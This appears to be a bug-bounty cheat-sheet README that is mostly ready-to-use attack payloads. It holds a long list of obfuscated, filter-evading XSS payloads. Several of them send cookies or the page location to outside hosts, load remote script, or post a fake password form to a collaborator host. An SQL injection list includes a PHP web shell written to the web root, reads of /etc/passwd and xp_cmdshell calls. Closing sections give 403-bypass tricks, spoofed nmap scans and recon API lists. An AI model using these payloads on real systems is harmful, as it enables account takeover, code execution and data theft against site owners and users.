β What is cross-site scripting (XSS)?
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script (JavaScript, etc), to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. XSS can cause a variety of problems for the end user, that range in severity: from an annoyance, to complete account compromising.
XSS attacks may be conducted without using <script>...</script>
html tags. Other html tags will do exactly the same thing, for example: <body onload=alert('test1')>
or other html attributes such as: onmouseover, onerror, onload, etc... (source)
Do not use the following xss payloads in a random or unauthorized web application, I do not take any resposibility
to anyone willing to execute or exploit them on random endpoints and parameters, you have been warned!
π΄ Click to view my personal custom list of XSS Payloads
--- Important Note ---
--- Please do consider that these payloads are used not for fuzzing nor to be added to a wordlist, ---
--- there are many payloads here that would need additional actions to properly work. ---
--- But of course, if you do wish to add some of them to a wordlist, then there's no problem at all! ---
--- I also add commentary about every/most of the payloads in the commit history --
<script>alert(document.domain+"\n\n"+document.cookie);<script>
</script><svg><script/class=rodric>alert(1)</script>-%26apos;
</SCRIPT>"><svg/OnLoad="`${prompt``}`">exemplo
""><svg/onload=alert(1)>%27/---+{{77}}"
;//<!----><SCRIPT>alert(1);</SCRIPT><svg onload="alert(document.domain)">
;//<!----><SCRIPT>alert(1);</SCRIPT><svg onerror="alert(document.write(1337))">
<svg onload='alert(1)'
<svg onload="alert(1)"
<svg onload=alert(1)//
<svg onload=alert(1)+
<svg onload=alert(1)<!--
<svg/onload=window.alert();//
<!--><svg/onload=window.alert();//
"><img src =" x "oerror = " alert ('RodricBr); ">
"><script><svg/alert%20(document.cookie)</script>
%22on%3eerror=%22prompt(document.domain)
%27%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
%3Cscript%3Ealert(document.domain);%3C/script%3E
--><font color=blue><h1>xss<img src onerror=alert(`XSS`)>/
"onmouseover=alert(1)//
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
'onerror=%22alert%60kauenavarro%60%22testabcd))/
%3cscript%3eprompt(document.domain)%3c%2fscript%3e
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.domain%29%3C/ScRiPt%3E
'"()%26%25<acx><ScRiPt%20>alert(document.domain)</ScRiPt>
'();}]9676"></script><script>alert(document.domain)</script>
"%20"><input><img src=x onerror=alert(document.domain)>%3
%22%3E%3C%2Fa%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28document.cookie%29%3B%3E%3C%2Fscript%3E
%3Cmarquee%20loop%3d1%20width%3d0%20onfinish%3dco\u006efirm(document.cookie)%3EXSS%3C%2fmarquee%3E
"><svg+svg+svg\/\/On+OnLoAd=confirm(document.cookie)>
javascript:alert(document.domain)
%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3B%3E
%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28POCkauenavarroxss%29%3E
;'"/'/><svg/onload=confirm('teste
'%22()%26%25<acx><ScRiPt%20>alert(1)</ScRiPt>
<ScRiPt>prompt%289371%29<%2FScRiPt>=<ScRiPt>alert%28document.domain%29<%2FsCrIpT>
0%0d%0a%0d%0a23%0d%0a<svg%20onload=confirm(document.domain)>%0d%0a0%0d%0a
%27x%27onclick=%27alert(1)
onMouseOvER=prompt(/xss/)//
%27%20onclick=alert(document.domain)%20accesskey=X%20
%3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E
asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie)
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
<// style=x:expression\28write(1)\29>
<!--[if]><script>alert(1)</script -->
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>@cr:0xInfection
<script>eval(atob(decodeURIComponent("payload")))//
<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere
<svg onx=() onload=(confirm)(1)>
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>teste</a>
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
1'"><img/src/onerror=.1|alert``>
<--`<img/src=` onerror=confirm``> --!>
javascript:{alert`0`}
<base href=//knoxss.me?
<a69/onclick=[1].findIndex(alert)>sussy
<input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>
3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{
0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
<table background="javascript:alert(1)"></table>
"/><marquee onfinish=confirm(123)>a</marquee>
<svg/onload=alert()//
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<a69/onclick=write()>hi
<svg/onload=self[`aler`%2b`t`]`1`>
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
"/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
java%0dscrip%0d%1b%1bt:console.log`${document.cookie}`}
java%0dscrip%0d%1b%1bt:console.log`${location=`https://www.pudim. com?c=${document.cookie}`}
"><x onauxclick=a=alert,a(domain)>click
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
<sc%00ript>confirm(1)</script>
\"><iframe/src=javascript:alert%26%23x000000028%3b)>
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7
jaVasCript:/*-/*`/*\`/*'/*"/**/(/*+*/oNcliCk=alert()+)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video><source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.domain);">
<isindex x="javascript:" onmouseover="alert(document.domain)">
"></SCRIPT>''>'><SCRIPT>alert(String.fromCharCode(88.83.83))</SCRIPT>
"><img src="x:x" onerror="alert(document.domain)">
"><iframe src="javascript:alert(document.domain)">
<object data="javascript:alert(document.domain)">
<isindex type=image src=1 onerror=alert(document.domain)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(document.domain)>">
<meta content="
 1 
; JAVASCRIPT: alert(document.domain)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<meta http-equiv="refresh" content="0;url=javascript:confirm(document.domain)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(document.domain)">X
</script><img/*%00/src="worksinchrome:prompt(document.domain)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/document.domain/))}//<style></style>
<img src="/" =_=" title="onerror='prompt(document.domain)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa href=javascript:alert(document.domain)>CLICK
<form><button formaction=javascript:alert(document.domain)>CLICK
<input/onmouseover="javaSCRIPT:confirm(1)"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:confirm(document.domain)"></OBJECT>
javascripT:eval('var a=document.createElement(\'script\'):a.src=\'https://ofjaaaah.xss.ht\':document.body.appendChild(a)')
%3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E
%3Cx%20y=1%20z=%271%26apos;%27onclick=self[`al`%2B`ert`](1)%3E%23CLICK%20MEE
0%3Bdata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgUE9DbCIpPC9zY3JpcHQ%22HTTP-EQUIV%3D%22refresh%22
xss><svg/onload=globalThis[`al`+/ert/.source]`1`//
"-top['al\x65rt']('sailay')-"
<div onactivate=confirm('Xss') id=xss style=overflow:scroll>
><div onactivate=confirm('Xss')>
<a href="javas%09cript:[1].map(top['ale'+'rt'])">
<a href="jav%0Dascript:alert(1)">
<svg/onload=location=javas+cript:ale+rt%2+81%2+9;//
'/><img/src/onerror=confirm(1)>
%E2%80%A8%E2%80%A9confirm(1)
;confirm(document.domain)//
;onerror=alert;throw%201
<input autofocus ng-focus=β$event.path|orderBy:β[].constructor.from([1],alert)ββ>
<textarea onbeforecopy=alert(1) autofocus>XSS</textarea>
<textarea onbeforecut=alert(1) autofocus>XSS</textarea>
<textarea onbeforepaste=alert(1) autofocus></textarea>
<tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus>
<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus>
<th oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<th oncut=alert(1) value="XSS" autofocus tabindex=1>test
<th ondblclick="alert(1)" autofocus tabindex=1>test</th>
<th onfocusout=alert(1) tabindex=1 id=x></th><input autofocus>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
');}</script><img src=q onerror=confirm(document.domain)>
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click
<details onauxclick=confirm`xss`></details>
<x onauxclick=a=alert,a(domain)>click
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
<a href="javas%09cript:[1].map(top['ale'+'rt'])">
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
"><svg/on</script>laod=alert>
<ijavascriptmg+src+ojavascriptnerror=confirm(1)>
</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
javascript:new%20Function`al\ert\`1\``;
<b/onanimationstart=prompt`${document.domain}`>
<style>@keyframes a{}b{animation:a;}</style>
<sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
<Svg Only=1 OnLoad=confirm(1)>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
"><svg onload=prompt%26%230000000040document.domain)>
"><svg onload=prompt(document.domain)>
"><svg onload=alert%26%230000000040"1")>
"><svg onload=prompt%26%23x000000028;document.domain)>
Supremo-XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS
Supremo-XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>
Supremo-XSS"><input %00 onControl hello oninput=confirm(domain) x>
"()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt>
<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/AmoloHT/`>
'`"><svg onmouseover=confirm(document.domain)>
<p title=" </noscript><style onload=alert(document.domain)//">
%0d%0a</script><img+src=x+onerror=alert(document.domain)>
%0d%0a</script><h1+onmouseover=alert(document.cookie)>mouseOver</h1>
<a href=//X55.is autofocus onfocus=import(href)>%3Ca+href=//X55.is+autofocus+onfocus=import(href)%3E
<a href=javascript:'\74svg/onload\75alert\501\51\76'>
-20a")});a=alert;a(1);//
valor%0aalert(1)%3C/script%3E
<svg onload=a=')',b='t(1',j='javas',s='cript:aler',location=j+s+b+a>
"/><svg onauxclick=co\u006efirm(\1\)>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
<svg><animate%20onend=alert(document.cookie)%20attributeName=x%20dur=1s>
<h1/%6f%6e/oNclicK=alert`hacked`>APTH
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>
" onmouseenter=confirm(1)//
'%20onmouseenter=confirm(1)//
<Svg+OnLoad=import(%27//X55.is%27)>#alert(document.domain)//
%22%27%22%3E%3CMETA%20HTTP-EQUIV%3Drefresh%20CONTENT%3D1%3E%3F%3D
<form action="@collaberator.burpcollaborator.net">Password:<br><input name="p"><br><input type="submit" value="Join meet"></form><\!--
<a/+/OnMoUsEOVEr+=+(confirm)(document.domain)>
/(A('onerror=%22alert%601%60%22testabcd))/
/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders
(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f
"%20onmouseenter=confirm(document.domain)%20value="
'"onclick=(co\u006efirm)?.0><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)1"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1>
<iMg/srC/onerror=alert2>%22%3E%3CSvg/onload=confirm3//<Script/src=//ChiragXSS.xSs.ht></scripT>
"><svg onload=document.forms[1].action='http://localhost/?Hacked'>
"><<![\CDATA[<]]>img src=x onerror=prompt(document.domain)>
<svg/onload=eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))>
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>
<svg onload='new Function`["_Y000!_"].find(al\u0065rt)`'>
<img/src=`%00`%20onerror=this.onerror=confirm(1)
<iframe %00 src="	javascript:prompt(1)	"%00>
<input/onmouseover="javaSCRIPT:confirm(1)"
''""><a OnpoINTeRENtEr=confirm(document.domain)x>
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
%7B%7Bconstructor.constructor(%27confirm(document.domain)%27)()%7D%7D
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
"document.body['innerHTML']=atob('PGltZyBzcmM9InRlc3RlLnBuZyIgb25lcnJvcj0iYWxlcnQod2luZG93Lm9yaWdpbikiPg==')
%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
%26%2302java%26%23115cript:alert(document.domain)
"><button%20popovertarget=x>Click%20me</button>%0A<xss%20onbeforetoggle=location=`javas`%2B`cript:ale`%2B`rt%2`%2B`81%2`%2B`9`%20popover%20id=x>XSS</xss>
%3Cxss%20contenteditable%20onbeforeinput=alert(1)%3Etest
%27%3E%0A%3C!--%3E%3Ca%20href=%22javascript:import(%27%2f%2fX55.is%27)%22%3ECLICK%3C/a%3E%0A%3C!--%3E
%22bestxss=%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='import(%60/%09/x55.is//%60)';b='javascript:';location=b%2Ba%22%3ESEARCHHERE%3C!--.html
<details open onToGgle=abc=(co\u006efirm);abc(VulneravelXSS)//
%22%3E%3Ca%20href=%22javascript%26%2358%3Bconfirm(1)%22%3E
%22%3E%3Ca%20href=%22javascript%26colon;confirm(1)%22%3E
javascript:%26%23x3A%3Bconfirm(1)
<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
<video><source onerror="alert.constructor.constructor('return this')().alert('β0f')">
[][`filter`][`constructor`](String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))() %22%3E%3Cxss%20contenteditable%20onbeforeinput%3D%22a%3D%27promp%27%3Bf%3D%27t%27%3Bb%3D%27%28%27%3Bc%3D%271%27%3Bd%3D%27%29%27%3Be%3D%27javascript%3A%27%3Blocation%3De%2Ba%2Bf%2Bb%2Bc%2Bd%22%3EGREPSTRING%3C
%22%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='promp';f='t';b='%26%230000000040';c='1';d='%26%230000000041';e='javascript:';location=e%2Ba%2Bf%2Bb%2Bc%2Bd%22%3EGREPSTRING%3C
%22%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='promp';f='t';b='(';c='1';d=')';e='javascript:';location=e%2Ba%2Bf%2Bb%2Bc%2Bd%22%3EGREPSTRING%3C
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
1'"><INPUT HRef=\" AutoFocus OnFocus="var a='ale';var b='rt';var c='()';top[a+b]`11`"><"
';k='e'%0Atop['al'+k+'rt'](1)//
<Img Src=OnXSS OnError=alert(1)>
<Img Src=//X55.is OnLoad%0C=import(Src)>
2%22%3E%3C!--%3E%3Cinput%20autofocus%20id=//X55.is%20onfocus=import(id)%3E#alert(document.cookie)
%3Csvg%3E%3Ca%20xmlns:xlink=http://www.w3.org/1999/xlink%20xlink:href=?%3E%3Ccircle%20r=400%20/%3E%3Canimate%20attributeName=xlink:href%20begin=0%20from=javascript:alert(1)%20to=%26%3E
%27%22-import(%60data:text/javascript%60%2batob(%27Ow==%27)%2b%60base64,YWxlcnQoMSk=%60)-%22/
-->"'/></script><deTailS open x=">" ontoggle=(co\u006efirm)``>
β What is SQL Injection?
SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. Consists of an insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. (source)
- Advanced SQL Injection payloads for endpoint/parameter fuzzing
π΄ Click to view my personal custom list of SQL Injection Payloads
' /*!50000union*/ select 1,2,3,4,5,6,7,8,'data://text/plain,<?php echo system("uname -a");?>'-- -
' /*!50000union*/ select 1,2,3,4,5,6,7,8,'data://text/plain,<?php $a="sy";$b="stem";$c=$a.$b; $c("uname -a");?>' -- -
β /*!50000union*/ select 1,2,3,4,5,'../index',7,8,'php://filter/convert.base64-encode/resource=.' -- -
admin' and (select * from(select(sleep(40)))SQLI) and 'abc' = 'ab
-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,LOAD_FILE('/etc/passwd'),NULL;#
-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,"<?php echo shell_exec($_REQUEST['cmd']);?>",NULL INTO OUTFILE '/var/www/html/c.php';#
(select(0)from(select(sleep(20)))v)/*'+
(select(0)from(select(sleep(20)))v)+'\"+
(select(0)from(select(sleep(20)))v)+\"*/
'+(select*from(select(sleep(20)))a)+'
xxxx'; EXEC xp_cmdshell 'ping interact';--
orwa' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
1' OR NOT 2470=2470--
orwa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||'
-1+/*!12345UnIoN*//**/(/*!12345SEleCt*//**/ 1,2)+ β +
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
1' Union Select 1-- -
1%27/**/%256fR/**/50%2521%253D22%253B%2523
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
- BLIND SQL Injection in the X-Fowarded-For HTTP Header.
- In an attempt to bypass authorization schema.
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
β What is cURL is a tool to transfer data from or to a server.?
cURL is a command-line interface(CLI) tool for transferring data specified with URL syntax.
#!/bin/bash
echo -e "\n$1 \t[$CODE_]"
CODE_=$(curl -w "%{http_code}\n" -s -o /dev/null "$1")
Change the program permission to executable using chmod +x,
passing the first argument($1) as the target domain.
- .NET Deserialization.
The first thing to note about this whole process is that essentially serialization is just a fancy word for converting objects in a program's memory into another format that is easier to share or send over the network. These "serialized" formats are usually quite easy for humans to read, especially when compared to the raw binary format they are stored as in memory. XML and JSON are common examples of these easy to read serialization formats. Deserialization is, as the name suggests, the opposite process. Converting back from XML/JSON/etc into a .NET object in memory that the program can work with.
curl -v -s -k https://www.website.com/Login.aspx | grep VIEW >> output.txt
cat output.txt | awk -v value="[teste]>>> " '{print value$5}' | tr -d value=\" | awk '{print $2}' | sed 'G'
- Mind maps for 403 Bypass: https://github.com/KathanP19/HowToHunt/tree/master/Status_Code_Bypass
- Bypassing 403 medium post
HTTP 403 is an HTTP status code meaning access to the requested resource is forbidden. The server understood the request, but will not fulfill it, due to lack of privilege on the application.
Tips: Try adding ./
, //
after the url
- Example:
site.com/./
ORsite.com//
Try using different request methods to access the unauthorized file/path: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
.
Check the response headers, maybe some information can be given. For example, a 200 response to HEAD with Content-Length: 55 means that the HEAD request method can access the info. But you still need to find a way to exfiltrate that info.
Using a HTTP header like X-HTTP-Method-Override: PUT
can overwrite the request method used.
Use TRACE request method and, if you are very lucky, maybe in the response you can see also the headers added by intermediate proxies that might be useful as information.
Additional content
curl -s -k -X GET https://www.site.com/ -v -H "X-Originating-IP: 127.0.0.1, 68.180.194.242" -H "User-Agent: GoogleBot" -H "Content-Length:0"
curl -i -s -k -X GET https://www.site.com/ -H "Host: www.site.co" -H "X-rewrite-url: directory"
Nmap Ultimate Scan v1 (man)
nMap (Network Mapper) is a network discovery and security tool.
nMap is used to discover hosts and services on a computer network by sending packets and analyzing the responses.
It can also be used for web application testing.
- Replace the API-KEY with your Shodan API Key
sudo nmap --randomize-hosts -Pn 0.0.0.0 --script shodan-api --script-args shodan-api.apikey=API-KEY -v -sS --open --reason --ttl=128 -sV --top-ports=20 --min-rate=2000 -T3 --spoof-mac=google -g443 --script="not intrusive" -oN resultados.txt
--randomize-hosts :: Tells Nmap to shuffle each group of up to 16384 hosts before it scans them.
-Pn :: Skips the host discovery stage altogether.
--script * :: Invoking the script to Shodan API.
-v :: Verbose mode.
-sS :: TCP SYN scan.
--open :: Show open ports.
--reason :: Shows the reason each port is set to a specific state and the reason each host is up or down.
--ttl=128 :: Tricks the Target/Firewalls of thinking the user is scanning using Windows OS.
-sV :: -sS added with -sV means that in case a port doesn't respond with SYN/ACK, Nmap will close the conection with RST.
--top-ports=20 :: Scan 20 most common ports (Can be set to any number).
--min-rate=2000 :: Send packets no slower than 2000 per second.
-T3 :: Timing template set to polite.
--spoof-mac=google :: Spoof MAC address.
-g443 :: Spoof source port number.
--script="not intrusive" :: Loads every script except for those in the intrusive category.
-oN :: Output the results to a file named resultados.txt
wFuzz (man)
- wFuzz is a web application fuzzing tool.
- You can find awesome wordlists here
sudo wfuzz --hc 404,400,302,301 -u https://site.com/FUZZ -w WORDLIST.txt -H "User-Agent: Googlebot-News" -t 50
--hc :: Ignore 404, 400, 302 and 301 status codes.
-u :: Url with the FUZZ param where the program shall do the fuzzing.
-w :: Using a wordlist.
-H :: Trying to trick the WAF with a Google-bot user agent.
-t :: Using 50 threads.
- APIs for a variety of target reconnaissance!
- Tip: Can be used with cURL to make automated tools using shell/bash script.
- Replace URL.COM with your target's domain.
The purpose of an API(Application Programming Interface) is to facilitate communication between software. They provide a format for applications and devices to talk to one another and exchange data in response to commands. This Request/Response pair is a fundamental component in an API
https://api.hackertarget.com/dnslookup/?q=URL.COM
https://api.threatminer.org/v2/domain.php?q=URL.COM&rt=5
https://api.hackertarget.com/findshareddns/?q=URL.COM
https://api.hackertarget.com/reversedns/?q=URL.COM
https://api.hackertarget.com/zonetransfer/?q=URL.COM
https://dns.google.com/resolve?name=URL.com&type= (TXT,MX,AAAA,A,CNAME,NS,SOA,PTR,SPF,SRV... etc)
https://api.hackertarget.com/hostsearch/?q=URL.COM
https://sonar.omnisint.io/subdomains/URL.COM
https://jldc.me/anubis/subdomains/URL.COM
https://riddler.io/search/exportcsv?q=pld:URL.com
- Alien Vault limit parameter can be set to any integer number,
- as well as the page parameter.
- Common Crawl outputs with json format.
https://otx.alienvault.com/api/v1/indicators/hostname/URL.COM/url_list?limit=50&page=1
https://index.commoncrawl.org/CC-MAIN-2021-43-index?url=URL.COM&output=json
https://api.hackertarget.com/nmap/?q=URL.COM
https://urlscan.io/api/v1/search/?q=domain:URL.COM&size=10000
NobodyKnows :: Base creator of the Nmap command
Me :: Making it look cool & easy! :)